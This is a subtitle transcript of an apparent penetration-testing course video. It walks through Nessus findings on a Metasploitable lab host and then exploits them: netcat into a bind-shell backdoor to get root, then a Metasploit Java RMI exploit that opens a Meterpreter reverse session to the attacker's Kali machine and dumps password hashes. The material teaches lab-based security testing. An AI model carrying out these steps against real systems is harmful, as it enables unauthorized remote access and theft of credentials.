1
00:00:00,360 --> 00:00:02,740
So the scan is completed in 17 minutes.

2
00:00:03,390 --> 00:00:08,940
Now, another pause here, because I disabled the Windows plugins, it seems as if the Windows systems

3
00:00:08,940 --> 00:00:10,640
don't have critical vulnerabilities.

4
00:00:10,980 --> 00:00:15,960
It's not right, especially my Windows XP has several critical vulnerabilities.

5
00:00:16,530 --> 00:00:21,930
If you didn't disable Windows plugins, you're supposed to see some more vulnerabilities for Windows

6
00:00:21,930 --> 00:00:22,440
systems.

7
00:00:23,720 --> 00:00:30,680
Now to see the results of the vulnerability scan in detail, let's click the Metasploitable result, .206.

8
00:00:32,020 --> 00:00:39,100
Nessus Home found 10 critical vulnerabilities with this scan configuration, but please note that

9
00:00:39,100 --> 00:00:46,000
the configuration affects the results, so the target systems may have more vulnerabilities than reported.

10
00:00:47,740 --> 00:00:54,100
If there is a vulnerability and it's not found in a scan, we call it a false negative.

11
00:00:55,230 --> 00:01:01,400
I'm sure you know that the critical vulnerabilities are the most dangerous ones, but that's where it

12
00:01:01,400 --> 00:01:02,040
gets good.

13
00:01:02,060 --> 00:01:04,450
They are the most exploitable ones in general.

14
00:01:05,180 --> 00:01:11,240
So let's click on one of these critical vulnerabilities, for example, Bind Shell Backdoor Detection.

15
00:01:12,670 --> 00:01:18,280
Well, look at the description, it says a shell is listening on the port without any authentication

16
00:01:18,280 --> 00:01:19,060
being required.

17
00:01:19,750 --> 00:01:21,880
This is obviously a backdoor.

18
00:01:23,020 --> 00:01:25,090
You see the port number, 1524.

19
00:01:25,600 --> 00:01:31,270
Now let's check if the finding is a true positive. Go to the terminal screen.
20
00:01:31,850 --> 00:01:40,810
I use the Netcat tool to connect. Simply type nc, the target IP, and the target port, 1524, and we're

21
00:01:40,810 --> 00:01:41,020
in.

22
00:01:42,430 --> 00:01:44,230
We have the shell for Metasploitable.

23
00:01:45,670 --> 00:01:50,970
Type whoami to learn the credential we have; we are the root user.

24
00:01:51,550 --> 00:01:54,880
Now, it was too simple, it's just not fun.

25
00:01:54,880 --> 00:01:56,620
And, you know, I don't like it.

26
00:01:56,620 --> 00:01:57,610
I like a good challenge.

27
00:01:57,610 --> 00:01:57,900
Right.

28
00:01:58,330 --> 00:02:03,010
I mean, we are the root user and we can access anything we want.

29
00:02:03,010 --> 00:02:07,420
For example, the shadow file, which contains the hashes of the users' passwords.

30
00:02:14,510 --> 00:02:21,830
OK, back to the browser and click on the Back to Vulnerabilities link to return to the vulnerabilities

31
00:02:21,830 --> 00:02:22,640
of Metasploitable.

32
00:02:23,750 --> 00:02:25,310
Now, I'd like to show you some more.

33
00:02:26,690 --> 00:02:33,710
Scrolling down the vulnerabilities, it shows 50 vulnerabilities per page by default, but let's make

34
00:02:33,710 --> 00:02:36,350
it 200 to see all the findings on a single page.

35
00:02:37,980 --> 00:02:43,320
Now, the findings are ordered by severity levels, so Info is at the bottom.

36
00:02:44,290 --> 00:02:50,470
Findings with the severity level of Info identify non-vulnerability information, which is,

37
00:02:50,470 --> 00:02:55,260
you know, nice to know, and it keeps it separate from the vulnerability detail.

38
00:02:57,070 --> 00:03:01,990
So here there's an Info finding, RMI Registry Detection. Let's click it.

39
00:03:02,880 --> 00:03:08,700
It says that the remote host is running an RMI registry, retrieving remote objects in the Java Remote

40
00:03:08,700 --> 00:03:10,300
Method Invocation system.
41
00:03:11,370 --> 00:03:17,220
So let's look at the exploits of the Metasploit Framework to see if there is any exploit for Java RMI.

42
00:03:38,710 --> 00:03:42,160
Open the terminal screen and run msfconsole.

43
00:03:49,990 --> 00:03:55,180
So here we have msfconsole. Let's search the exploits for RMI.

44
00:04:09,150 --> 00:04:10,190
Too many results.

45
00:04:11,750 --> 00:04:15,650
To keep it more specific, I want to search Java RMI.

46
00:04:22,310 --> 00:04:30,470
So we have two auxiliaries and two exploits at this time. So look at the exploit in the last line: this

47
00:04:30,470 --> 00:04:37,100
module takes advantage of the default configuration of the RMI registry and RMI activation services,

48
00:04:37,520 --> 00:04:39,950
which allow loading classes from any remote

49
00:04:39,950 --> 00:04:40,640
URL.

50
00:04:41,800 --> 00:04:44,020
Let's try to use it on our RMI port.

51
00:04:45,340 --> 00:04:49,570
Please don't worry, I am going to explain what these all mean.

52
00:04:49,750 --> 00:04:53,050
I just want to show you an example at the beginning.

53
00:04:53,440 --> 00:04:54,220
So bear with me.

54
00:04:54,790 --> 00:04:57,760
I use the module name with the full path.

55
00:04:58,580 --> 00:05:04,090
You can simply select the module name and click the middle button of the mouse to copy and paste it.

56
00:05:05,400 --> 00:05:10,470
Type show payloads to see the payloads that can be used with this module.

57
00:05:12,130 --> 00:05:15,050
So I want to use this payload to have a Meterpreter session.

58
00:05:15,110 --> 00:05:20,020
Again, don't worry, I'll explain what Meterpreter is soon, but just copy and paste the payload

59
00:05:20,020 --> 00:05:25,920
name. Type show options to see the parameters of the exploit and the payload as well.

60
00:05:27,010 --> 00:05:34,660
Set the remote host as Metasploitable, 206. The default remote port is the same as our port,

61
00:05:34,660 --> 00:05:35,560
1099.
62
00:05:36,550 --> 00:05:44,500
SRVHOST is the local host to listen on. Set this to be our Kali, 222.

63
00:05:45,500 --> 00:05:47,420
By default, SRVPORT remains.

64
00:05:49,180 --> 00:05:51,310
So the other options are not required.

65
00:05:51,340 --> 00:05:52,450
I'll just leave them blank.

66
00:05:53,850 --> 00:06:01,200
Now, for the payload options, set the listen host to be our Kali, 222. The default

67
00:06:01,200 --> 00:06:07,590
listen port is good, 4444, and finally type exploit to run the exploit.

68
00:06:15,060 --> 00:06:18,210
So there, it looks like we have a Meterpreter session.

69
00:06:19,250 --> 00:06:26,720
Type sessions -l to list the active sessions. Be patient, we'll see them in detail. Type sessions

70
00:06:27,060 --> 00:06:34,070
-i <session ID> to interact with a session, and here we are, we're in now.

71
00:06:34,070 --> 00:06:38,380
I'm going to show you what we can do with a Meterpreter session in the following chapter.

72
00:06:38,690 --> 00:06:44,180
But here's a couple of Meterpreter commands: sysinfo to see the system information.

73
00:06:48,050 --> 00:06:50,660
hashdump to gather password hashes.

74
00:06:51,560 --> 00:06:58,970
Now, no such command for this system. Thankfully, we have an alternative for this. Type run post/linux/

75
00:06:59,420 --> 00:07:05,060
gather/hashdump and hit enter, and collect the fruits of your labor.

76
00:07:06,210 --> 00:07:12,890
So as you see here, we found another way to exploit the system, even though the finding was just Info.

77
00:07:13,710 --> 00:07:17,430
So I hope you understand not to underestimate any finding.